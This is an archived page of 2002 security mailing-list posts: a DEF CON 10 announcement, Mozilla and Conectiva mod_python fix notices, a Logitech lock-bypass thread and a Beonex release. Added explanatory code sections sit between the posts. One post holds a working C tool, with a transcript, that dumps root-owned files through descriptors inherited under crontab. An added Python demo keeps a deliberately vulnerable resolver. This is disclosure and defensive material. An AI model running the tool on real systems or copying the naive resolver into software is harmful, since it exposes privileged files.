Announcing DEF CON 10!

2002-05-03 Thread The Dark Tangent

  D E F  C O N  10   C O N V E N T I O N

READ AND DISTRIBUTE AND READ AND DISTRIBUTE AND READ AND 

Initial Announcement: 05/01/2002

We are proud to announce the 10th annual Def Con.

The 10th anniversary of what has become the largest hacker
convention on the planet! DEF CON 10 will be August 2nd to the 4th
at the Alexis Park Hotel and Resort in Las Vegas, Nevada, USA.


[ What is DEF CON ]

Defcon is a convention for the more underground elements of the
computer culture. Defcon is geared towards hackers, programmers,
phreaks, cyberpunks, cypherpunks, open source hackers, civil liberty
and privacy advocates, HAMs, casual bystanders, lookieloos, feds,
reporters, and anyone interested in seeing what's going on in the
computer underground today.


[ What's Happening ]

WHO:   You know who you are, you shady characters.
WHAT:  A convention for you to meet, party, and listen to some speeches
that you would normally never hear.
WHEN:  August 2nd to the 4th - 2002
WHERE: Las Vegas, Nevada @ The Alexis Hotel & Resort

Taking advantage of expanded meeting space this year, there will not
only be three tracks of speaking, but two break out areas for small
mini-classes on select topics.

For complete up to the minute information visit http://www.defcon.org/
The following is a brief overview of what to expect.


[ Wireless Network ]

At DC 9 we grew the coverage of the wireless network to cover most of
the Alexis Park. We operate an 802.11b wireless network with a gateway
to the net. It is a wide open network with no WEP security, assigning
addresses by a DHCP server. Yes, people mess with the DHCP server, but
all in all it works well.

NEW for this year: DEF CON will continue to grow the network, as well
as provide some dedicated servers for attendees to use. For example we
will have a web/ftp server set up where people can upload pictures they
have taken in order to share them with the rest of the con attendees.
DEF CON will also have a limited amount of 802.11a access points for
Really high speed access. While all this great bandwidth is limited by
our net connection, it will be great for people on the local network to
swap pictures and data.


[ Call for Papers ]

If you are interested in speaking at DEF CON TEN, please read this Call
for Papers announcement and follow the directions to submit a talk.
http://www.defcon.org/html/dc10/defcon-10-cfp.html


[ Speaking ]

There will be three speaking areas and two break out areas for
demonstration and classes. Speaking will start an hour or two later in
the day than in previous years, and go an hour later into the evening.
Look to the web site once speakers have been selected for the exact
schedule and changes.


[ Break Out Areas ]

The two break out areas will hold around 150 people each, and will be
used for specific demonstrations or talks that would not work well in
the really large speaking areas. An example of a break out talk might
be on how to modify your TiVO, where audience members would be walked
through working on their own TiVO. Topics such as radio modification,
killer robot building, chipping your PS2, etc. would all work well for
the break out areas.


[ Hotel Room Video ]

We've gotten the bugs worked out of the hotel's broadcast system. This
year we will be broadcasting 3 separate channels on the hotel's
internal TV system. One channel will be playing movies, anime, and
other kinds of entertainment. The other two will be used for
broadcasting the speakers. This should help with the overcrowding that
sometimes occurs, as well as allowing our attendees to relax in their
rooms and not miss anything.


[ Streaming Audio/Video ]

Provided we have the bandwidth, we will be streaming all of the audio
and video from the event. Hopefully, we can put up a few reflectors in
different geographical areas so that folks in all parts of the wired
world will be able to tune in and see what's going on.

OFFICIAL EVENTS

[ Capture the Flag Contest ]

An expanded version of the classic CTF contest, this year will feature
more audience participation. There will be multiple IDS systems plugged
into wall projectors reporting on what is happening, as well as some
custom filters to keep track of what team is ahead. NEW for this year,
with the help of the three-time CTF winners, the Ghetto Hackers, this
year's contest will be all new and action oriented.
http://www.ghettohackers.net/ctf/ has all the latest contest
information.


[ DJs ]

There will be DJs again at DEF CON, but there will be no DJ room as in
past years. Instead this year there will be more of a cool out lounge
with DJs, chairs, and it will be more of a place to hang out. The party
is nice for the Black and White ball on Saturday night, but in the mean
time we want to provide that space for you 

Fix for Mozilla XMLHttpRequest file disclosure vulnerability

2002-05-03 Thread Frank Hecker

For those not already aware of this, note that a fix for the 
XMLHttpRequest file disclosure vulnerability (Bugtraq id 4628) reported 
by GreyMagic Software has been checked into the Mozilla source tree. The 
fix is included in new Mozilla 1.0 branch nightly builds dated 2 May 
2002 or later available through mozilla.org:

http://ftp.mozilla.org/pub/mozilla/nightly/latest-1.0.0/

and will be included in the upcoming Mozilla 1.0 release and any further 
1.0 Release Candidates distributed through mozilla.org. For more 
information on the fix please see bug report 141061 in the Mozilla 
project's public bug database:

http://bugzilla.mozilla.org/show_bug.cgi?id=141061

On behalf of the Mozilla community we at mozilla.org thank all the 
people who participated in discovering, reporting, investigating, and 
fixing this bug.

As a reminder, reports of Mozilla-related security vulnerabilities can 
be reported via email to [EMAIL PROTECTED], and will be handled in 
accordance with the mozilla.org policy on handling security bugs:

http://www.mozilla.org/projects/security/security-bugs-policy.html

Frank

-- 
Frank Hecker
[EMAIL PROTECTED]




[CLA-2002:477] Conectiva Linux Security Announcement - mod_python

2002-05-03 Thread secure

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
CONECTIVA LINUX SECURITY ANNOUNCEMENT 
- --------------------------------------------------------------------------

PACKAGE   : mod_python
SUMMARY   : Remote vulnerability
DATE      : 2002-05-03 17:35:00
ID        : CLA-2002:477
RELEVANT
RELEASES  : 7.0, 8

- --------------------------------------------------------------------------

DESCRIPTION
 Mod_python is an Apache module that embeds the Python interpreter
 within the server.
 
 As stated[1] by Allan Saddi in the mailing list of mod_python, there
 was a vulnerability which would allow a publisher to access an
 indirectly imported module, thus allowing a remote attacker to call
 functions from that module (which is an unexpected and potentially
 dangerous behavior).


SOLUTION
 All mod_python users should do the upgrade. Notice that after the
 installation you have to restart the httpd service manually in order
 to load the new module. To achieve this you can execute the following
 command (as root):
 
 # service httpd restart
 
 
 REFERENCES:
 1. http://www.modpython.org/pipermail/mod_python/2002-April/001991.html


DIRECT DOWNLOAD LINKS TO THE UPDATED PACKAGES
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/mod_python-2.7.8-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/mod_python-2.7.8-1U70_1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/mod_python-2.7.8-1U8_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/mod_python-2.7.8-1U8_1cl.src.rpm


ADDITIONAL INSTRUCTIONS
 Users of Conectiva Linux version 6.0 or higher may use apt to perform 
 upgrades of RPM packages:
 - add the following line to /etc/apt/sources.list if it is not there yet
   (you may also use linuxconf to do this):

 rpm [cncbr] ftp://atualizacoes.conectiva.com.br 6.0/conectiva updates

(replace 6.0 with the correct version number if you are not running CL6.0)

 - run: apt-get update
 - after that, execute: apt-get upgrade

 Detailed instructions regarding the use of apt and upgrade examples 
 can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en


- --------------------------------------------------------------------------
All packages are signed with Conectiva's GPG key. The key and instructions
on how to import it can be found at 
http://distro.conectiva.com.br/seguranca/chave/?idioma=en
Instructions on how to check the signatures of the RPM packages can be
found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en
- --------------------------------------------------------------------------
All our advisories and generic update instructions can be viewed at
http://distro.conectiva.com.br/atualizacoes/?idioma=en

- --------------------------------------------------------------------------
subscribe: [EMAIL PROTECTED]
unsubscribe: [EMAIL PROTECTED]
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE80vT242jd0JmAcZARAlo+AJ0Xi/BKHJ556v4A1uOSyEVMD1pVKgCgkKDO
Ak2JwqgiKhJEXGmMOj2w0Hg=
=z2C9
-----END PGP SIGNATURE-----
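The advisory describes the defect only in one sentence: the publisher could be steered into a module the published code had merely imported, so any function of that module became callable over HTTP. The following is an added example written for this page, not mod_python's code and not Conectiva's patch: a toy URL-to-callable resolver in the style of a publisher handler, first in the permissive form that exhibits the problem and then with the checks a maintainer would want (no private names, no descent into module objects, and only callables whose `__module__` is the published module). The module name `myapp`, the `hello` function and the URL paths are constructed for the example.

```python
"""Added example (not mod_python's own code): publisher-style resolver
with and without the 'indirectly imported module' hole.

Module and path names below are constructed for the illustration."""
import types
import os  # plays the role of a module the published code happens to import


class PublishError(Exception):
    """Raised when a URL path must not be mapped to a callable."""


def make_published_module():
    """Build a module like one an application would put under the publisher.

    Constructed inline so the example runs offline: it contains one function
    that genuinely belongs to the module, one private helper, and a reference
    to an imported module (os) that must never become reachable from a URL."""
    mod = types.ModuleType("myapp")
    mod.os = os                       # indirectly imported module

    def hello(name="world"):
        return "hello " + name
    hello.__module__ = mod.__name__   # as if it were def'd inside myapp.py
    mod.hello = hello
    mod._secret = lambda: "internal"  # private helper, not for the web
    return mod


def resolve_naive(mod, path):
    """Permissive resolver: walks every attribute, so /os/<anything> works.

    This is the behaviour class the advisory describes; kept here only to
    show what the checks in resolve_safe() refuse."""
    obj = mod
    for part in path.strip("/").split("/"):
        obj = getattr(obj, part)
    return obj


def resolve_safe(mod, path):
    """Resolver with the traversal restricted to the published module itself."""
    obj = mod
    for part in path.strip("/").split("/"):
        if not part or part.startswith("_"):
            raise PublishError("private or empty path component: %r" % part)
        try:
            obj = getattr(obj, part)
        except AttributeError:
            raise PublishError("not found: %r" % part) from None
        if isinstance(obj, types.ModuleType):
            # An imported module is reachable as an attribute, but descending
            # into it would expose everything that module defines.
            raise PublishError("traversal into imported module %r refused" % part)
    if not callable(obj):
        raise PublishError("%r is not callable" % path)
    owner = getattr(obj, "__module__", None)
    if owner != mod.__name__:
        raise PublishError("callable belongs to %r, not to %r" % (owner, mod.__name__))
    return obj


def try_resolve(mod, path):
    """Return (True, callable) or (False, reason) so callers see the outcome."""
    try:
        return True, resolve_safe(mod, path)
    except PublishError as exc:
        return False, str(exc)


if __name__ == "__main__":
    m = make_published_module()
    for p in ("/hello", "/os/getcwd", "/_secret", "/nope"):
        ok, what = try_resolve(m, p)
        print(p, "->", what() if ok else "REFUSED: " + what)
    print("naive resolver reaches:", resolve_naive(m, "/os/getcwd").__name__)
```

The `__module__` check is what closes the hole for functions that were imported by name (`from os import getcwd` would otherwise bypass the module-object test), and the underscore rule keeps helpers the author never meant to publish off the web.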




Re: trusting user-supplied data (was Re: FreeBSD Security Advisory FreeBSD-SA-02:23.stdio)

2002-05-03 Thread Paul Starzetz

Steven M. Bellovin wrote:

> The list includes, but is not limited to:
>
>    command-line array
>    environment array
>    open files


I don't think there was enough research on open file descriptor 
problems. For example, I found this small bug while playing around with 
crontab on Linux:

gcc cronread.c -o cronread

export VISUAL=/bin/vi
crontab -e

:sh          (escape to shell)

./cronread

0000 iz OPEN    st_uid 24129    st_gid 5    PATH /dev/pts/15/fd/0
dump (y/n) n

0001 iz OPEN    st_uid 24129    st_gid 5    PATH /dev/pts/15/fd/1
dump (y/n) n

0002 iz OPEN    st_uid 24129    st_gid 5    PATH /dev/pts/15/fd/2
dump (y/n) n

0003 iz OPEN    st_uid 0    st_gid 0    PATH /var/spool/cron/deny
dump (y/n) y

--- DUMPING /var/spool/cron/deny ---

guest
gast


---
0005 iz OPEN
0006 iz OPEN


ls -l /var/spool/cron/deny
-rw-------    1 root     root           11 Oct 25  2001 /var/spool/cron/deny


So I'm able to read a privileged system file using this technique :- 
Not necessary to mention the consequences of inheriting such a fd open 
for writing. More effort must be put to investigate this problem in 
current Linux/Unix suid/setgid binaries.

have fun with the attached source.

/ih



/****************************************
 *                                      *
 *   insecure FD seeker                 *
 *   by IhaQueR '2002                   *
 *                                      *
 ****************************************/

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <linux/limits.h>

#define TMPLEN 1024

/* rewind the descriptor and print whatever it refers to, byte by byte */
void dumpfd(int fd, char *name)
{
    int r;
    char c = 13;

    if (lseek(fd, 0, SEEK_SET) == (off_t)-1) {
        perror("lseek");
        return;
    }
    printf("\n--- DUMPING %s ---\n\n", name);
    do {
        r = read(fd, &c, sizeof(c));
        if (r > 0) {
            printf("%c", c);
        }
    } while (r > 0);
    printf("\n\n---");
    fflush(stdout);
}

int main(void)
{
    int i, r;
    uid_t uid;
    gid_t gid;
    struct stat st;
    char buf[TMPLEN];    /* /proc/<pid>/fd/<n> */
    char path[TMPLEN];   /* what that symlink points to */

    uid = getuid();
    gid = getgid();

    /* walk every possible descriptor number and see which ones are open */
    for (i = 0; i < NR_OPEN; i++) {
        r = fstat(i, &st);
        if (!r) {
            printf("\n%.4d iz OPEN", i);
            /* an inherited file owned by someone else is the interesting case */
            if (st.st_uid != uid || st.st_gid != gid) {
                printf("\tst_uid %d\tst_gid %d", (int)st.st_uid, (int)st.st_gid);
                snprintf(buf, sizeof(buf), "/proc/%d/fd/%d", (int)getpid(), i);
                /* readlink() does not NUL-terminate; terminate from its length */
                r = readlink(buf, path, sizeof(path) - 1);
                if (r < 0)
                    r = 0;
                path[r] = 0;
                printf("\tPATH %s ", path);
                printf("\tdump (y/n) ");
                r = getchar();
                if (r == 'y')
                    dumpfd(i, path);
                getchar();   /* swallow the newline after the answer */
            }
        }
    }
    printf("\n\n");
    fflush(stdout);

    return 0;
}
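The post above shows the problem from the inheriting side: a descriptor on a root-owned file survives into an unprivileged child. The following is an added example, not the poster's code: the measures a setuid/setgid program can take on its own side before it spawns a helper such as the editor that `crontab -e` launches. It reopens a closed stdin/stdout/stderr on /dev/null (so a later open() cannot land on descriptor 0, 1 or 2), marks a descriptor close-on-exec, and closes every descriptor above 2 by listing /proc/self/fd, the same directory the poster's tool reads. The function names and the use of /dev/null as the probe file are my own choices; the /proc/self/fd walk falls back to a bounded brute-force loop where procfs is not mounted.

```c
/* Added example (not the original poster's code): keeping privileged
 * descriptors from leaking into a helper process. Linux/glibc assumed. */
#include <dirent.h>
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Ensure descriptors 0, 1 and 2 are open. A setuid program started with
 * one of them closed would hand its next open() that number, and later
 * writes meant for "stderr" would go into that file. Returns how many
 * had to be re-opened on /dev/null, or -1 on failure. */
int sanitize_std_fds(void)
{
    int reopened = 0;
    for (int fd = 0; fd <= 2; fd++) {
        if (fcntl(fd, F_GETFD) != -1 || errno != EBADF)
            continue;                                   /* already open */
        int nul = open("/dev/null", fd == 0 ? O_RDONLY : O_WRONLY);
        if (nul == -1)
            return -1;
        if (nul != fd) {                                /* should not happen, but be safe */
            if (dup2(nul, fd) == -1) { close(nul); return -1; }
            close(nul);
        }
        reopened++;
    }
    return reopened;
}

/* Mark a descriptor close-on-exec so it does not survive execve() into a
 * helper (the editor in the crontab -e case). Returns 0 on success. */
int set_cloexec(int fd)
{
    int flags = fcntl(fd, F_GETFD);
    if (flags == -1)
        return -1;
    return fcntl(fd, F_SETFD, flags | FD_CLOEXEC) == -1 ? -1 : 0;
}

/* Close every descriptor above keep_max (normally 2), for code paths where
 * CLOEXEC discipline cannot be guaranteed. Returns the number closed. */
int close_inherited_fds(int keep_max)
{
    int closed = 0;
    DIR *d = opendir("/proc/self/fd");
    if (d == NULL) {                                    /* no procfs: bounded brute force */
        long maxfd = sysconf(_SC_OPEN_MAX);
        if (maxfd < 0 || maxfd > 65536)
            maxfd = 65536;
        for (long fd = keep_max + 1; fd < maxfd; fd++)
            if (close((int)fd) == 0)
                closed++;
        return closed;
    }
    int dfd = dirfd(d);                                 /* opendir's own descriptor */
    struct dirent *e;
    while ((e = readdir(d)) != NULL) {
        char *end;
        long fd = strtol(e->d_name, &end, 10);
        if (e->d_name[0] == '\0' || *end != '\0')
            continue;                                   /* "." and ".." */
        if (fd <= keep_max || fd == dfd)
            continue;
        if (close((int)fd) == 0)
            closed++;
    }
    closedir(d);
    return closed;
}

/* Self-check: open a probe file, apply both measures, and report whether a
 * child would still see the descriptor. Returns 1 when it is gone. */
int demo_inherited_fd_is_closed(void)
{
    int fd = open("/dev/null", O_RDONLY);
    if (fd == -1)
        return -1;
    int had_cloexec = set_cloexec(fd) == 0 && (fcntl(fd, F_GETFD) & FD_CLOEXEC);
    close_inherited_fds(2);
    int gone = fcntl(fd, F_GETFD) == -1 && errno == EBADF;
    return had_cloexec && gone;
}

int main(void)
{
    printf("std descriptors reopened on /dev/null: %d\n", sanitize_std_fds());
    printf("probe descriptor closed before exec: %d\n", demo_inherited_fd_is_closed());
    return 0;
}
```

Of the three, close-on-exec is the one to apply at every open() in a privileged program; the sweep of /proc/self/fd is the belt-and-braces step before handing control to code you do not own, and it is also a cheap thing to audit for in the suid/sgid binaries the poster says deserve more attention.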




Re: Logitech Keyboard Insecurity

2002-05-03 Thread KJK::Hyperion

At 00.15 03/05/2002, you wrote:
>> Logitech has been contacted about 1 month ago and they have confirmed 
>> it is indeed a problem with their software, but a fix is not yet out. A 
>> 'locked' computer should indeed be locked, and not accessible via any 
>> means. While this bug is a low risk, it shows how *obvious* flaws go 
>> undetected. It totally bypasses GINA (Graphical Identification aNd 
>> Authentication), which is supposed to keep the PC secure (to the extent 
>> of requiring Ctrl-Alt-Delete to login).
> Hrrm...  Is the driver signed by Microsoft?  If it is, that seems to be 
> something that Microsoft should be checking from now on before they 
> certify keyboard drivers.

It's not the driver's fault. I highly doubt Microsoft would ever sign, no, 
wait, that Logitech would ever WRITE a driver that launched user-mode 
processes at all, as it's undocumented, unsupported, prone to errors, and 
hideously insecure, not to mention very tedious to code and debug, with 
many hidden pitfalls (having rewritten Win32 CreateProcess for personal 
exercise using only NT kernel functions, I know). This doesn't apply to 
Windows 95, where launching user-mode apps from device drivers, and 
generally breaking the user-kernel barrier, is unbelievably straightforward.

The hidden app that communicates with the driver (you know, the small 
bugger in the system tray) and manages the special keys is to blame, and 
it's not signed for sure - AFAIK they only sign kernel-mode executables.

This is lousy design, BTW. They shouldn't allow apps to completely subvert 
the Windows input chain by allowing them to communicate directly with the 
keyboard driver, like I guess they do - the special keys should be sent as 
F13, F14, and so on, and the launcher app should receive them only by 
registering the appropriate hotkeys for the current desktop.




Beonex Communicator 0.8-pre based on Mozilla 1.0-branch released

2002-05-03 Thread Ben Bucksch

The open-source project Beonex, dedicated to bringing Mozilla to the 
masses, has released version 0.8-pre of Beonex Communicator for Windows and 
Linux. It is based on Mozilla 1.0-branch code from around 2002-04-30 and can 
be downloaded at http://www.beonex.com/communicator.

Beonex Communicator was never vulnerable to the XMLHttpRequest attack. 
Earlier versions might have been vulnerable to other symptoms of the 
same bug, though, so the new version includes the fix previously 
announced by Frank Hecker.

The IRC scheme crash reported as followup is believed not to be exploitable.

It is strongly recommended that users of earlier versions of Beonex 
Communicator upgrade to the new version, because older versions contain 
said bugs and are no longer supported.

Ben Bucksch
Beonex